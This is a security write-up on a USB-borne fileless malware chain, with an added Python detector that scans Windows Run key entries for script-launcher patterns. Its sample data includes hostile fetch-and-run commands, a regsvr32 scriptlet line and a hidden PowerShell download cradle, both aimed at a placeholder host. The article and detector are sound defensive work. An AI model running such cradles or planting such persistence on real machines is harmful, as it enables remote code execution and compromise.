In early August, researchers at Trend Labs were investigating a backdoor (BKDR_ANDROM.ETIN) that was being installed filelessly on target machines by a script detected as JS_POWMET.DE. They initially assumed the script was downloaded by users or dropped by other malware; they eventually traced the initial infection to USB drives.
On a Windows 10 machine the infection chain is fairly straightforward. It begins when a USB drive carrying two malicious files, both detected as TROJ_ANDROM.SVN, is inserted into the machine. The malicious code is decrypted and executed directly in memory rather than written to disk (hence "fileless"), and an autostart registry entry is created so that the chain runs again on every reboot. It is this autostart entry that brings JS_POWMET onto the machine: rather than pointing at a file on disk, the entry launches regsvr32 with scrobj.dll to fetch and run the script from a remote URL. JS_POWMET in turn downloads and executes TROJ_PSINJECT, which downloads a file that looks like an ordinary favicon. That favicon is decrypted into BKDR_ANDROM.ETIN, the final payload, which is then executed. On earlier versions of Windows the process is mostly the same, except that a second backdoor (BKDR_ANDROM.SMRA) is also installed; its purpose was unclear to the Trend Labs researchers.
While attacks of this type are sophisticated and can be quite damaging, fileless does not mean invisible. The chain still has to persist, here through a Run key whose value launches regsvr32 and PowerShell with network-fetched scripts, and those are exactly the behaviours that endpoint solutions monitoring autostart entries, process launches and script execution can scan for and block before the final payload ever runs. Because the initial foothold arrives on removable media, controlling which USB devices are allowed on a machine removes the first step of the chain entirely.
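The following is an added example of the kind of check an endpoint tool would run against the persistence step of the chain described above; it is not code from the original article or from Trend Labs. It scans autostart (Run key) values for the patterns a fileless chain leaves behind: regsvr32 loading a scriptlet from a URL through scrobj.dll, PowerShell download cradles, encoded or hidden-window PowerShell, and mshta launched with a remote or script: URL. The sample entries, their names and the example.invalid URLs are constructed for illustration and are not real indicators.

```python
import re

# Constructed sample of Run key values, shaped like an export from a
# registry-monitoring sensor. Entries 2 and 3 are hypothetical and modelled
# on the fileless persistence pattern described in the article: the value
# launches a script fetched from the network instead of a file on disk.
RUN_KEY = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"

SAMPLE_RUN_VALUES = [
    {"key": RUN_KEY, "name": "OneDrive",
     "data": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'},
    {"key": RUN_KEY, "name": "COM+",
     "data": r"regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"key": RUN_KEY, "name": "Updater",
     "data": "powershell -w hidden -nop -ep bypass -c "
             "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    {"key": RUN_KEY, "name": "Spotify",
     "data": r'"C:\Users\user\AppData\Roaming\Spotify\Spotify.exe" --autostart'},
]

# Detection rules: (rule name, regex matched case-insensitively against the
# value data). Each one targets a launcher that can execute code that was
# never written to disk as an executable.
RULES = [
    # regsvr32 /i:<url> scrobj.dll: fetch and run a remote scriptlet
    ("regsvr32-scriptlet",
     re.compile(r"regsvr32(\.exe)?\b.*?/i:\s*https?://.*?scrobj\.dll", re.I)),
    # PowerShell fetching and evaluating code from the network
    ("powershell-download-cradle",
     re.compile(r"powershell(\.exe)?\b.*?(downloadstring|downloadfile|iex\b|"
                r"invoke-expression|frombase64string|invoke-webrequest)", re.I)),
    # PowerShell with a base64-encoded command line
    ("powershell-encoded-command",
     re.compile(r"powershell(\.exe)?\b.*?\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # PowerShell started with a hidden window, typical of autostart payloads
    ("powershell-hidden-window",
     re.compile(r"powershell(\.exe)?\b.*?\s-w(indowstyle)?\s+hidden\b", re.I)),
    # mshta executing a remote HTA or an inline javascript:/vbscript: URL
    ("mshta-remote",
     re.compile(r"mshta(\.exe)?\b\s+(https?|javascript|vbscript):", re.I)),
]


def classify_autostart(data: str) -> list[str]:
    """Return the names of all rules that match one autostart value's data."""
    return [name for name, pattern in RULES if pattern.search(data)]


def scan_autostart(values: list[dict]) -> list[dict]:
    """Return the entries that trip at least one rule, annotated with the rule names."""
    hits = []
    for entry in values:
        rules = classify_autostart(entry["data"])
        if rules:
            hits.append({**entry, "rules": rules})
    return hits


if __name__ == "__main__":
    for hit in scan_autostart(SAMPLE_RUN_VALUES):
        print(f"{hit['key']}\\{hit['name']}: {', '.join(hit['rules'])}")
        print(f"    {hit['data']}")
```

Run against the constructed sample, only the COM+ and Updater entries are flagged; the two legitimate entries, which point at executables on disk, pass untouched. In a real deployment the same rules would be applied to registry-set events as they happen rather than to a static export, so the entry is caught at the moment it is written, before the next reboot gives it a chance to run.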